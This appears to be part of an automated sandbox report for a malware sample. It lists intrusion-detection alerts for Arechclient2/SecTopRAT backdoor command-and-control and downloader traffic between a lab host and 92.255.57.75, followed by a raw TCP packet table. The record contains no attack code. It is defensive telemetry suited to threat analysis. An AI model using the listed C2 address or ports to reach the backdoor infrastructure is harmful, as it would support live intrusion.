2024-12-17T08:41:29.431685+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50097	92.255.57.75	9000	TCP
2024-12-17T08:41:29.431685+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50097	92.255.57.75	9000	TCP
2024-12-17T08:41:30.998176+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50098	92.255.57.75	9000	TCP
2024-12-17T08:41:30.998176+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50098	92.255.57.75	9000	TCP
2024-12-17T08:41:32.560204+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50099	92.255.57.75	9000	TCP
2024-12-17T08:41:32.560204+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50099	92.255.57.75	9000	TCP
2024-12-17T08:41:34.128273+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50100	92.255.57.75	9000	TCP
2024-12-17T08:41:34.128273+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50100	92.255.57.75	9000	TCP
2024-12-17T08:41:35.695801+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50101	92.255.57.75	9000	TCP
2024-12-17T08:41:35.695801+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50101	92.255.57.75	9000	TCP
2024-12-17T08:41:37.312462+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50102	92.255.57.75	9000	TCP
2024-12-17T08:41:37.312462+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50102	92.255.57.75	9000	TCP
2024-12-17T08:41:38.874060+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50103	92.255.57.75	9000	TCP
2024-12-17T08:41:38.874060+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50103	92.255.57.75	9000	TCP
2024-12-17T08:41:40.436730+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50104	92.255.57.75	9000	TCP
2024-12-17T08:41:40.436730+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50104	92.255.57.75	9000	TCP
2024-12-17T08:41:42.010830+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50105	92.255.57.75	9000	TCP
2024-12-17T08:41:42.010830+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50105	92.255.57.75	9000	TCP
2024-12-17T08:41:42.667709+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50107	92.255.57.75	15647	TCP
2024-12-17T08:41:42.984016+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50107	92.255.57.75	15647	TCP
2024-12-17T08:41:43.104759+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50107	92.255.57.75	15647	TCP
2024-12-17T08:41:43.574508+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50106	92.255.57.75	9000	TCP
2024-12-17T08:41:43.574508+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50106	92.255.57.75	9000	TCP
2024-12-17T08:41:43.871385+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	50107	TCP
2024-12-17T08:41:44.140194+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:45.021396+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:45.134788+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50108	92.255.57.75	9000	TCP
2024-12-17T08:41:45.134788+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50108	92.255.57.75	9000	TCP
2024-12-17T08:41:45.137600+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:45.379965+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:45.380713+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	50109	TCP
2024-12-17T08:41:46.742376+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50110	92.255.57.75	9000	TCP
2024-12-17T08:41:46.742376+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50110	92.255.57.75	9000	TCP
2024-12-17T08:41:48.291590+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50111	92.255.57.75	9000	TCP
2024-12-17T08:41:48.291590+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50111	92.255.57.75	9000	TCP
2024-12-17T08:41:49.859405+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50112	92.255.57.75	9000	TCP
2024-12-17T08:41:49.859405+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50112	92.255.57.75	9000	TCP
2024-12-17T08:41:51.418630+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50113	92.255.57.75	9000	TCP
2024-12-17T08:41:51.418630+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50113	92.255.57.75	9000	TCP
2024-12-17T08:41:52.980262+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50114	92.255.57.75	9000	TCP
2024-12-17T08:41:52.980262+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50114	92.255.57.75	9000	TCP
2024-12-17T08:41:54.587030+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50115	92.255.57.75	9000	TCP
2024-12-17T08:41:54.587030+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50115	92.255.57.75	9000	TCP
2024-12-17T08:41:56.247736+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50116	92.255.57.75	9000	TCP
2024-12-17T08:41:56.247736+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50116	92.255.57.75	9000	TCP
2024-12-17T08:41:57.060510+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50118	92.255.57.75	15647	TCP
2024-12-17T08:41:57.820857+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50117	92.255.57.75	9000	TCP
2024-12-17T08:41:57.820857+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50117	92.255.57.75	9000	TCP
2024-12-17T08:41:58.266298+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50118	92.255.57.75	15647	TCP
2024-12-17T08:41:58.287437+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	50118	TCP
2024-12-17T08:41:59.373645+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50119	92.255.57.75	9000	TCP
2024-12-17T08:41:59.373645+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50119	92.255.57.75	9000	TCP
2024-12-17T08:42:00.936757+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50120	92.255.57.75	9000	TCP
2024-12-17T08:42:00.936757+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50120	92.255.57.75	9000	TCP
2024-12-17T08:42:02.626168+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50121	92.255.57.75	9000	TCP
2024-12-17T08:42:02.626168+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50121	92.255.57.75	9000	TCP
2024-12-17T08:42:04.197750+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50122	92.255.57.75	9000	TCP
2024-12-17T08:42:04.197750+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50122	92.255.57.75	9000	TCP
2024-12-17T08:42:05.762277+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50123	92.255.57.75	9000	TCP
2024-12-17T08:42:05.762277+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50123	92.255.57.75	9000	TCP
2024-12-17T08:42:07.342589+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50124	92.255.57.75	9000	TCP
2024-12-17T08:42:07.342589+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50124	92.255.57.75	9000	TCP
2024-12-17T08:42:08.640978+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:08.903624+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50125	92.255.57.75	9000	TCP
2024-12-17T08:42:08.903624+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50125	92.255.57.75	9000	TCP
2024-12-17T08:42:09.053917+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:09.089848+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:09.796876+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:09.843412+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	50126	TCP
2024-12-17T08:42:10.466558+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50127	92.255.57.75	9000	TCP
2024-12-17T08:42:10.466558+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50127	92.255.57.75	9000	TCP
2024-12-17T08:42:12.025774+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50128	92.255.57.75	9000	TCP
2024-12-17T08:42:12.025774+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50128	92.255.57.75	9000	TCP
2024-12-17T08:42:13.592122+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50129	92.255.57.75	9000	TCP
2024-12-17T08:42:13.592122+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50129	92.255.57.75	9000	TCP
2024-12-17T08:42:14.140224+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50131	92.255.57.75	15647	TCP
2024-12-17T08:42:14.624410+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50131	92.255.57.75	15647	TCP
2024-12-17T08:42:15.154112+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50130	92.255.57.75	9000	TCP
2024-12-17T08:42:15.154112+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50130	92.255.57.75	9000	TCP
2024-12-17T08:42:15.272040+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50131	92.255.57.75	15647	TCP
2024-12-17T08:42:15.342844+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	50131	TCP
2024-12-17T08:42:16.722434+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50132	92.255.57.75	9000	TCP
2024-12-17T08:42:16.722434+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50132	92.255.57.75	9000	TCP
2024-12-17T08:42:18.277830+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50133	92.255.57.75	9000	TCP
2024-12-17T08:42:18.277830+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50133	92.255.57.75	9000	TCP
2024-12-17T08:42:19.840543+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50134	92.255.57.75	9000	TCP
2024-12-17T08:42:19.840543+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50134	92.255.57.75	9000	TCP
2024-12-17T08:42:21.404382+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50135	92.255.57.75	9000	TCP
2024-12-17T08:42:21.404382+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50135	92.255.57.75	9000	TCP
2024-12-17T08:42:23.000105+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50136	92.255.57.75	9000	TCP
2024-12-17T08:42:23.000105+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50136	92.255.57.75	9000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:38:19.560069084 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:19.560106993 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:19.560245037 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:19.573623896 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:19.573647976 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:20.787960052 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:20.788134098 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:20.896277905 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:20.896292925 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:20.896665096 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:20.896738052 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:20.899085045 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:20.939331055 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.367216110 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.367274046 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.367299080 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.367362976 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.367368937 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.367413044 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.367423058 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.367469072 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.367476940 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.367481947 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.367507935 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.378554106 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.378637075 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.378643990 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.378714085 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.386940956 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.387044907 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.387056112 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.387109041 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.486869097 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.486918926 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.486932039 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.486982107 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.560802937 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.560863018 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.563266993 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.563354015 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.563365936 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.563528061 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.571485996 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.571566105 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.574577093 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.574632883 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.574647903 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.574693918 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.582833052 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.582895041 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.590888977 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.590974092 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.590980053 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.591025114 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.598959923 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.599163055 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.599169970 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.599219084 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.607156038 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.607294083 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.607299089 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.607357979 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.615303993 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.615374088 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.623481989 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.623548985 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.623554945 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.623642921 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.629968882 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.630021095 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.630033970 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.630085945 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.636379957 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.636439085 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.636444092 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.636529922 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.642805099 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.642991066 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.649250031 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.649317980 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.649348974 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.649401903 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.655791044 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.655867100 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.751177073 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.751332998 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.752526045 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.752708912 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.752716064 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.752914906 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.757332087 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.757405996 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.762029886 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.762095928 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.767021894 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.767282963 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.776601076 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.776696920 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.780479908 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.780544996 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.788795948 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.788866997 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.793126106 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.793229103 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.801527023 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.801675081 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.809793949 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.809853077 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.818171978 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.818365097 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.822499037 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.822626114 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.830920935 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.830993891 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.835252047 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.835339069 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.944967985 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.945115089 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.948205948 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.948354959 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.954756975 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.954879999 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.960829973 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.961030960 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.966954947 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.967031002 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.969921112 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.969999075 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.975672960 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.975822926 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.978698969 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.978805065 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.984694958 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.984764099 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.990259886 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.990341902 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.996084929 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.996181965 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:21.999080896 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:21.999213934 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.004900932 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.004973888 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.010785103 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.010911942 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.013727903 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.013844967 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.019509077 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.019608974 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.025262117 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.025336027 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.028289080 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.028439045 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.034207106 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.034307003 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.040210962 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.040277958 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.042920113 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.042980909 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.136590004 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.139117002 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.139153004 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.139163971 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.139228106 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.139228106 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.143832922 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.144110918 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.146143913 CET	443	49709	104.21.48.1	192.168.2.11
